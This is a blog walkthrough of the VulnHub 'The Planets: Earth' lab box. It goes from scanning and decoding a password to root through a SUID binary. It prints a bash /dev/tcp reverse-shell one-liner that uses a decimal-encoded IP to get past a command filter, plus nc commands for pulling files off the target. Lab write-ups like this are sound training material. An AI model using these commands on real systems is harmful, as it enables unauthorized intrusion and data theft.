VulnHub: The Planets Earth Writeup

For this writeup, I’ll be going through how I completed VulnHub’s The Planets: Earth box.

Step 1: Nmap Scan

As usual, let’s perform an nmap scan to see what we’re dealing with

nmap -A -sS -p- -oN ./nmap_scan $BOX

• -A: Does a lot of stuff. According to man nmap, performs OS detection, version detection, script scanning, and traceroute
• -sS: TCP Scanning technique
• -p-: Scan all ports
• -oN <file_name>: Output nmap results to file for future reference
• $BOX: — Box IP

It seems we have a pretty setup with only 3 ports open. 22/ssh, 80/http, and 443/ssl. We also see we dig up some DNS information. Let’s deal with that first in the next step.

Step 2: Add to /etc/hosts

I’ll go ahead and add this entry from the nmap scan to /etc/hosts.

Step 3: Visit web pages

Now that we have that done, let’s check all of the sites and see what we can find. Let’s start by looking at port 80.

Mkay, nothing interesting here. Let’s check what’s on port 443.

and now let’s check those two entries we added to /etc/hosts

Step 4: Robots.txt

Checking each of the previously mentioned pages, you can eventually find an interesting robots.txt.

Checking each variation of /testingnotes.* against each of the extensions, you’ll eventually find /testingnotes.txt.

Step 5: Visit /testingnotes.txt

Seems to be some developer/admin notes left on the network. I went ahead and took note of the terra username for the admin portal. Let’s take a look at testdata.txt

It seems like this is what was used to encrypt the first few messages we see on the earth.local page. Let’s try to decode the messages on that page using this information.

Step 6: Decode Message(s)

Looking at the message on earth.local, it looks like it’s probably converting ASCII to hex. I’m going to detail how to decrypt the bottom message (starting with “2402”) because **spoiler**, the other messages are just gibberish.

First, we’ll need to convert the testdata.txt to hex. I just used a hex converter online for this.

I then took that and used it as the key on another website. I then put the message we want to decrypt into the left box for decryption.

I then took the hex results and converted it back to ASCII.

It seems that we get earthclimatechangebad4humans as a repeating string. Let’s try using this to login as terra.

Step 7: Login as Terra

I realize now that you’re probably wondering how I found the admin page. I forgot to mention previously that I ran gobuster on each of the web pages that we found. In doing that, I found that http://earth.local/admin exists:

Anyway, let’s visit that admin portal and login using the creds: terra/earthclimatechangebad4humans

Nice, it works and it seems to be a conveniently nice webpage for executing commands. Naturally, I’ll start by trying to pop a reverse shell.

Well, that’s annoying.

Step 8: Let’s see what we can do (user flag found)

Before proceeding forward, I start to dig around the filesystem and I eventually stumble across /var/earth_web which contains the user flag

Nice, now we just need to get the root flag.

Step 9: Reverse Shell Again

Doing some google searching, I find out that we can convert the IP to decimal and use bash to pop a reverse shell. This should allow for us to bypass the “Remote connections are forbidden” check because apparently it’s only checking if our input contains an IP. Don’t believe me? Watch what happens when I only input an IP with nothing else:

So anyway, let’s try it using my IP converted to decimal. For this, I just used an online tool to convert my IP.

bash -i >& /dev/tcp/172294500/10000 0>&1

Before executing this command, in another terminal I have a listener waiting with the command

nc -nvlp 10000

Now that our listener is up and running, we’ll go ahead and execute the command from the admin page and catch it with our listener.

Nice, we’re in. I’m just going to go ahead and spawn a TTY shell using python.

Step 10: Check SUIDs

Now that we have access to the system, let’s check our SUIDs and see if there’s anyway we can escalate to root.

find / -perm -4000 2>/dev/null

Hmm, /usr/bin/reset_root looks interesting. Running it seems to produce the following output

Awe yeah, I think we’re definitely looking in the right place. Let’s pull reset_root back to our box so we can take a closer look at it. We’ll do this by executing the following commands

Target machine: nc -w 3 <my_ip> <my_port> < reset_root

and

My Machine: nc -nvlp <port_i_want_to_use> > reset_root

Step 11: Investigate reset_root

Let’s start by running strings to see if we see anything interesting.

Taking a look at this, I can guess that it is trying to reset the root password based on some triggers. Let’s run ltrace to see what those triggers are. First we need to make the file executable on our box.

chmod +x ./reset_root

and then run ltrace on it

ltrace ./reset_root

Ah, so it just checks to see if those files exist? Well, let’s go ahead and create those on the target box and then run it again.

Nice, now let’s switch to root.

and now grab the root flag from root’s home directory

Conclusion

Overall, this was a pretty fun easy-level box to knockout. If you found other ways to cracking this box, definitely let me know below in the commands!

As always, if you enjoyed this post please consider checking out my other posts over on WordPress:

Feel free to also follow me via my other social media accounts: Instagram, Twitter, Facebook, and Medium!

Originally published at http://testingonprod.com on December 19, 2021.